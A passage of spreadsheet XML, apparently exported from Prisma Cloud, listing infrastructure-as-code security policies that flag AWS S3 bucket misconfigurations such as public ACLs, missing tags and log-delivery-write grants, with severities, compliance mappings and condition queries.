          <t>IaC:Storage:aws-s3</t>
        </is>
      </c>
      <c r="K1447" t="inlineStr">
        <is>
          <t>test2 : s3 bucket must have tags</t>
        </is>
      </c>
      <c r="L1447" t="inlineStr"/>
      <c r="M1447" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1447" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1447" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1447" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1447" t="inlineStr"/>
      <c r="R1447" t="inlineStr"/>
      <c r="S1447" t="inlineStr">
        <is>
          <t>s3tag</t>
        </is>
      </c>
      <c r="T1447" t="b">
        <v>0</v>
      </c>
      <c r="U1447" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1447" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3-bucket</t>
        </is>
      </c>
      <c r="W1447" t="inlineStr"/>
      <c r="X1447" t="inlineStr"/>
      <c r="Y1447" t="inlineStr"/>
      <c r="Z1447" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["aws_s3_bucket"],"conditionQuery":{"attribute":"tags","operator":"not_exists","value":"","cond_type":"attribute"}}</t>
        </is>
      </c>
      <c r="AA1447" t="inlineStr">
        <is>
          <t>Akintayo Akinbade</t>
        </is>
      </c>
      <c r="AB1447" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1447" t="inlineStr"/>
      <c r="AD1447" t="b">
        <v>0</v>
      </c>
      <c r="AE1447" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1447" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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7" t="inlineStr">
        <is>
          <t>6e134344-44bc-4b58-b8b8-ee63243bb31d</t>
        </is>
      </c>
      <c r="AI1447" t="inlineStr"/>
      <c r="AJ1447" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1447" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1448">
      <c r="A1448" t="inlineStr">
        <is>
          <t>CIS v1.2.0 (AWS)</t>
        </is>
      </c>
      <c r="B1448" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1448" s="2" t="inlineStr"/>
      <c r="D1448" t="inlineStr"/>
      <c r="E1448" t="inlineStr"/>
      <c r="F1448" t="inlineStr"/>
      <c r="G1448" t="b">
        <v>0</v>
      </c>
      <c r="H14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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1448" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3</t>
        </is>
      </c>
      <c r="K1448" t="inlineStr">
        <is>
          <t>Test IaC Policy</t>
        </is>
      </c>
      <c r="L1448" t="inlineStr"/>
      <c r="M1448" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1448" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1448" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1448" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1448" t="inlineStr">
        <is>
          <t>1</t>
        </is>
      </c>
      <c r="R1448" t="inlineStr">
        <is>
          <t>1.1</t>
        </is>
      </c>
      <c r="S1448" t="inlineStr"/>
      <c r="T1448" t="b">
        <v>0</v>
      </c>
      <c r="U1448" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1448" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3-bucket</t>
        </is>
      </c>
      <c r="W1448" t="inlineStr"/>
      <c r="X1448" t="inlineStr"/>
      <c r="Y1448" t="inlineStr"/>
      <c r="Z1448" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["aws_s3_bucket"],"provider":"aws","framework":["Terraform","CloudFormation"],"conditionQuery":{"attribute":"acl","operator":"not_equals","value":"log-delivery-write","cond_type":"attribute"}}</t>
        </is>
      </c>
      <c r="AA1448" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1448" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1448" t="inlineStr"/>
      <c r="AD1448" t="b">
        <v>0</v>
      </c>
      <c r="AE1448" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1448" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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8" t="inlineStr">
        <is>
          <t>e5e2780b-6425-42d2-add8-dddbe56ea85b</t>
        </is>
      </c>
      <c r="AI1448" t="inlineStr"/>
      <c r="AJ1448" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1448" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1449">
      <c r="A1449" t="inlineStr">
        <is>
          <t>CIS v1.2.0 (AWS)</t>
        </is>
      </c>
      <c r="B1449" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1449" s="2" t="inlineStr"/>
      <c r="D1449" t="inlineStr"/>
      <c r="E1449" t="inlineStr"/>
      <c r="F1449" t="inlineStr"/>
      <c r="G1449" t="b">
        <v>1</v>
      </c>
      <c r="H14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49" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1449" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3</t>
        </is>
      </c>
      <c r="K1449" t="inlineStr">
        <is>
          <t>S3 Bucket ACL where a log delivery-WRITE is not recommended</t>
        </is>
      </c>
      <c r="L1449" t="inlineStr"/>
      <c r="M1449" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1449" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1449" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1449" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1449" t="inlineStr">
        <is>
          <t>1</t>
        </is>
      </c>
      <c r="R1449" t="inlineStr">
        <is>
          <t>1.22</t>
        </is>
      </c>
      <c r="S1449" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="T1449" t="b">
        <v>0</v>
      </c>
      <c r="U1449" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1449" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3-bucket</t>
        </is>
      </c>
      <c r="W1449" t="inlineStr">
        <is>
          <t>The log Delivery group gets WRITE and READ_ACP permission on the bucket, thus cloud allow access to sensitive data</t>
        </is>
      </c>
      <c r="X1449" t="inlineStr"/>
      <c r="Y1449" t="inlineStr"/>
      <c r="Z1449" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["aws_s3_bucket"],"conditionQuery":{"attribute":"acl","operator":"not_equals","value":"log-delivery-write","cond_type":"attribute"}}</t>
        </is>
      </c>
      <c r="AA1449" t="inlineStr">
        <is>
          <t>Carlos Martins Jr.</t>
        </is>
      </c>
      <c r="AB1449" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1449" t="inlineStr"/>
      <c r="AD1449" t="b">
        <v>0</v>
      </c>
      <c r="AE1449" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1449" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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49" t="inlineStr">
        <is>
          <t>f1a2d73d-15b8-457f-a1e4-596aa6a3d646</t>
        </is>
      </c>
      <c r="AI1449" t="inlineStr"/>
      <c r="AJ1449" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1449" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1450">
      <c r="A1450" t="inlineStr">
        <is>
          <t>CIS v1.4.0 (AWS)</t>
        </is>
      </c>
      <c r="B1450" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1450" s="2" t="inlineStr"/>
      <c r="D1450" t="inlineStr"/>
      <c r="E1450" t="inlineStr"/>
      <c r="F1450" t="inlineStr"/>
      <c r="G1450" t="b">
        <v>1</v>
      </c>
      <c r="H14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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1450" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3</t>
        </is>
      </c>
      <c r="K1450" t="inlineStr">
        <is>
          <t>webinar_demo</t>
        </is>
      </c>
      <c r="L1450" t="inlineStr"/>
      <c r="M1450" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1450" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1450" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1450" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1450" t="inlineStr">
        <is>
          <t>Storage</t>
        </is>
      </c>
      <c r="R1450" t="inlineStr">
        <is>
          <t>2.1.5</t>
        </is>
      </c>
      <c r="S1450" t="inlineStr"/>
      <c r="T1450" t="b">
        <v>0</v>
      </c>
      <c r="U1450" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1450" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3-bucket</t>
        </is>
      </c>
      <c r="W1450" t="inlineStr"/>
      <c r="X1450" t="inlineStr"/>
      <c r="Y1450" t="inlineStr"/>
      <c r="Z1450" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["aws_s3_bucket"],"provider":"aws","framework":["Terraform"],"conditionQuery":{"attribute":"acl","operator":"equals","value":"log-delivery-write","cond_type":"attribute"}}</t>
        </is>
      </c>
      <c r="AA1450" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB1450" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1450" t="inlineStr"/>
      <c r="AD1450" t="b">
        <v>0</v>
      </c>
      <c r="AE1450" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1450" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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0" t="inlineStr">
        <is>
          <t>346fdb3d-aac7-4d73-ac97-026c55b5b5ff</t>
        </is>
      </c>
      <c r="AI1450" t="inlineStr"/>
      <c r="AJ1450" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1450" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1451">
      <c r="A1451" t="inlineStr"/>
      <c r="B1451" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1451" s="2" t="inlineStr"/>
      <c r="D1451" t="inlineStr"/>
      <c r="E1451" t="inlineStr"/>
      <c r="F1451" t="inlineStr"/>
      <c r="G1451" t="b">
        <v>1</v>
      </c>
      <c r="H14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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1451" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3</t>
        </is>
      </c>
      <c r="K1451" t="inlineStr">
        <is>
          <t>AWS S3 Bucket has an ACL defined which allows public WRITE access</t>
        </is>
      </c>
      <c r="L1451" t="inlineStr"/>
      <c r="M1451" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1451" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1451" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1451" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1451" t="inlineStr"/>
      <c r="R1451" t="inlineStr"/>
      <c r="S1451" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T1451" t="b">
        <v>0</v>
      </c>
      <c r="U1451" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1451" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3-bucket</t>
        </is>
      </c>
      <c r="W1451" t="inlineStr">
        <is>
          <t>S3 Bucket has an ACL defined which allows public WRITE access.</t>
        </is>
      </c>
      <c r="X1451" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/s3-policies/s3-2-acl-write-permissions-everyone</t>
        </is>
      </c>
      <c r="Y1451" t="inlineStr"/>
      <c r="Z1451" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["aws_s3_bucket"]}</t>
        </is>
      </c>
      <c r="AA1451" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1451" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1451" t="inlineStr">
        <is>
          <t>CKV_AWS_57</t>
        </is>
      </c>
      <c r="AD1451" t="b">
        <v>1</v>
      </c>
      <c r="AE1451" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1451" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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1" t="inlineStr">
        <is>
          <t>9806659e-4453-4d8e-9aaa-e8c80b8df1c7</t>
        </is>
      </c>
      <c r="AI1451" t="inlineStr"/>
      <c r="AJ1451" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1451" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1452">
      <c r="A1452" t="inlineStr">
        <is>
          <t>testing_jbrox_compliance</t>
        </is>
      </c>
      <c r="B1452" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1452" s="2" t="inlineStr"/>
      <c r="D1452" t="inlineStr"/>
      <c r="E1452" t="inlineStr"/>
      <c r="F1452" t="inlineStr"/>
      <c r="G1452" t="b">
        <v>1</v>
      </c>
      <c r="H14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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1452" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3</t>
        </is>
      </c>
      <c r="K1452" t="inlineStr">
        <is>
          <t>AWS S3 bucket ACL grants READ permission to everyone</t>
        </is>
      </c>
      <c r="L1452" t="inlineStr"/>
      <c r="M1452" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1452" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1452" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1452" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1452" t="inlineStr">
        <is>
          <t>1</t>
        </is>
      </c>
      <c r="R1452" t="inlineStr">
        <is>
          <t>2</t>
        </is>
      </c>
      <c r="S1452" t="inlineStr">
        <is>
          <t>CRITICAL,vstoyko : test</t>
        </is>
      </c>
      <c r="T1452" t="b">
        <v>0</v>
      </c>
      <c r="U1452" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1452" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3-bucket</t>
        </is>
      </c>
      <c r="W1452" t="inlineStr">
        <is>
          <t>S3 Bucket has an ACL defined which allows public READ access.</t>
        </is>
      </c>
      <c r="X1452" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/s3-policies/s3-1-acl-read-permissions-everyone</t>
        </is>
      </c>
      <c r="Y1452" t="inlineStr"/>
      <c r="Z1452" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["aws_s3_bucket"]}</t>
        </is>
      </c>
      <c r="AA1452" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1452" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1452" t="inlineStr">
        <is>
          <t>CKV_AWS_20</t>
        </is>
      </c>
      <c r="AD1452" t="b">
        <v>1</v>
      </c>
      <c r="AE1452" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1452" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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2" t="inlineStr">
        <is>
          <t>4a060a93-6f25-418d-9f08-472f62d5ba3c</t>
        </is>
      </c>
      <c r="AI1452" t="inlineStr"/>
      <c r="AJ1452" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1452" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1453">
      <c r="A1453" t="inlineStr">
        <is>
          <t>CIS v1.2.0 (AWS)</t>
        </is>
      </c>
      <c r="B1453" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1453" s="2" t="inlineStr"/>
      <c r="D1453" t="inlineStr"/>
      <c r="E1453" t="inlineStr"/>
      <c r="F1453" t="inlineStr"/>
      <c r="G1453" t="b">
        <v>1</v>
      </c>
      <c r="H14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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1453" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3</t>
        </is>
      </c>
      <c r="K1453" t="inlineStr">
        <is>
          <t>Demo-Visual-Editor-Policy</t>
        </is>
      </c>
      <c r="L1453" t="inlineStr"/>
      <c r="M1453" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1453" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1453" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1453" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1453" t="inlineStr">
        <is>
          <t>1</t>
        </is>
      </c>
      <c r="R1453" t="inlineStr">
        <is>
          <t>1.12</t>
        </is>
      </c>
      <c r="S1453" t="inlineStr">
        <is>
          <t>CIS</t>
        </is>
      </c>
      <c r="T1453" t="b">
        <v>0</v>
      </c>
      <c r="U1453" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1453" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3-bucket,aws-s3-bucket-inventory,aws-s3-bucket-metric,aws-s3-bucket-notification</t>
        </is>
      </c>
      <c r="W1453" t="inlineStr">
        <is>
          <t>S3 Bucket ACL where a log delivery-WRITE</t>
        </is>
      </c>
      <c r="X1453" t="inlineStr"/>
      <c r="Y1453" t="inlineStr"/>
      <c r="Z1453" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["aws_s3_bucket","aws_s3_bucket_inventory","aws_s3_bucket_metric","aws_s3_bucket_notification"],"provider":"aws","framework":["Terraform","CloudFormation"],"conditionQuery":{"attribute":"acl","operator":"not_equals","value":"log-delivery-write","cond_type":"attribute"}}</t>
        </is>
      </c>
      <c r="AA1453" t="inlineStr">
        <is>
          <t>Emmanuel Nwankwo</t>
        </is>
      </c>
      <c r="AB1453" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1453" t="inlineStr"/>
      <c r="AD1453" t="b">
        <v>0</v>
      </c>
      <c r="AE1453" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1453" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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3" t="inlineStr">
        <is>
          <t>9bad85e7-1a3e-4962-a44a-ed7970543f46</t>
        </is>
      </c>
      <c r="AI1453" t="inlineStr"/>
      <c r="AJ1453" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1453" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1454">
      <c r="A1454" t="inlineStr">
        <is>
          <t>Rehan</t>
        </is>
      </c>
      <c r="B1454" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1454" s="2" t="inlineStr"/>
      <c r="D1454" t="inlineStr"/>
      <c r="E1454" t="inlineStr"/>
      <c r="F1454" t="inlineStr"/>
      <c r="G1454" t="b">
        <v>0</v>
      </c>
      <c r="H14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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1454" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3</t>
        </is>
      </c>
      <c r="K1454" t="inlineStr">
        <is>
          <t>test-sara</t>
        </is>
      </c>
      <c r="L1454" t="inlineStr"/>
      <c r="M1454" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1454" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1454" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1454" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1454" t="inlineStr">
        <is>
          <t>Identity and Access Management</t>
        </is>
      </c>
      <c r="R1454" t="inlineStr">
        <is>
          <t>1.1</t>
        </is>
      </c>
      <c r="S1454" t="inlineStr"/>
      <c r="T1454" t="b">
        <v>0</v>
      </c>
      <c r="U1454" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1454" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3-bucket,aws-s3-bucket-policy</t>
        </is>
      </c>
      <c r="W1454" t="inlineStr"/>
      <c r="X1454" t="inlineStr"/>
      <c r="Y1454" t="inlineStr"/>
      <c r="Z1454" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["aws_s3_bucket","aws_s3_bucket_policy"],"provider":"aws","framework":["Terraform"],"conditionQuery":{"attribute":"grant.type","operator":"equals","value":"true","cond_type":"attribute"}}</t>
        </is>
      </c>
      <c r="AA1454" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1454" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1454" t="inlineStr"/>
      <c r="AD1454" t="b">
        <v>0</v>
      </c>
      <c r="AE1454" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1454" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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4" t="inlineStr">
        <is>
          <t>a2d6c5fe-dedf-44f9-ae0c-755fe0eec514</t>
        </is>
      </c>
      <c r="AI1454" t="inlineStr"/>
      <c r="AJ1454" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1454" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1455">
      <c r="A1455" t="inlineStr">
        <is>
          <t>test-tushir-dell, Marc World Custom Compliance, Rehan, test-luis</t>
        </is>
      </c>
      <c r="B1455" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1455" s="2" t="inlineStr"/>
      <c r="D1455" t="inlineStr"/>
      <c r="E1455" t="inlineStr"/>
      <c r="F1455" t="inlineStr"/>
      <c r="G1455" t="b">
        <v>1</v>
      </c>
      <c r="H14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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1455" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3</t>
        </is>
      </c>
      <c r="K1455" t="inlineStr">
        <is>
          <t>S3 bucket policy allows lockout all but root user</t>
        </is>
      </c>
      <c r="L1455" t="inlineStr"/>
      <c r="M1455" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1455" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1455" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1455" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1455" t="inlineStr">
        <is>
          <t>01</t>
        </is>
      </c>
      <c r="R1455" t="inlineStr">
        <is>
          <t>test01-luis</t>
        </is>
      </c>
      <c r="S1455" t="inlineStr">
        <is>
          <t>marclabel,SEC-01-01</t>
        </is>
      </c>
      <c r="T1455" t="b">
        <v>0</v>
      </c>
      <c r="U1455" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1455" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3-bucket,aws-s3-bucket-policy</t>
        </is>
      </c>
      <c r="W1455" t="inlineStr">
        <is>
          <t>Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes)</t>
        </is>
      </c>
      <c r="X1455" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/s3-policies/bc-aws-s3-24</t>
        </is>
      </c>
      <c r="Y1455" t="inlineStr"/>
      <c r="Z1455" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["aws_s3_bucket","aws_s3_bucket_policy"]}</t>
        </is>
      </c>
      <c r="AA1455" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1455" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1455" t="inlineStr">
        <is>
          <t>CKV_AWS_93</t>
        </is>
      </c>
      <c r="AD1455" t="b">
        <v>1</v>
      </c>
      <c r="AE1455" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1455" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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5" t="inlineStr">
        <is>
          <t>82908c8a-6bb8-4c63-b4b5-24967c9f7145</t>
        </is>
      </c>
      <c r="AI1455" t="inlineStr"/>
      <c r="AJ1455" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1455" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1456">
      <c r="A1456" t="inlineStr"/>
      <c r="B1456" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1456" s="2" t="inlineStr"/>
      <c r="D1456" t="inlineStr"/>
      <c r="E1456" t="inlineStr"/>
      <c r="F1456" t="inlineStr"/>
      <c r="G1456" t="b">
        <v>1</v>
      </c>
      <c r="H14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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1456" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3</t>
        </is>
      </c>
      <c r="K1456" t="inlineStr">
        <is>
          <t>AWS S3 bucket RestrictPublicBucket is not set to True</t>
        </is>
      </c>
      <c r="L1456" t="inlineStr"/>
      <c r="M1456" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1456" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1456" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1456" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1456" t="inlineStr"/>
      <c r="R1456" t="inlineStr"/>
      <c r="S1456" t="inlineStr"/>
      <c r="T1456" t="b">
        <v>0</v>
      </c>
      <c r="U1456" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1456" t="inlineStr">
        <is>
          <t>IaC:Storage:aws-s3-bucket-public-access-block</t>
        </is>
      </c>
      <c r="W1456" t="inlineStr">
        <is>
          <t>Ensure S3 bucket has 'restrict_public_bucket' enabled</t>
        </is>
      </c>
      <c r="X1456" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/s3-policies/bc-aws-s3-22</t>
        </is>
      </c>
      <c r="Y1456" t="inlineStr"/>
      <c r="Z1456" t="inlineStr">
        <is>
          <t>{"category":"Storage","resourceTypes":["aws_s3_bucket_public_access_block"]}</t>
        </is>
      </c>
      <c r="AA1456" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1456" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1456" t="inlineStr">
        <is>
          <t>CKV_AWS_56</t>
        </is>
      </c>
      <c r="AD1456" t="b">
        <v>1</v>
      </c>
      <c r="AE1456" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1456" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG14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6" t="inlineStr">
        <is>
          <t>ed4af42c-c3fc-4857-aca8-3b254a141465</t>
        </is>
      </c>
      <c r="AI1456" t="inlineStr"/>
      <c r="AJ1456" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1456" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1457">
      <c r="A1457" t="inlineStr"/>
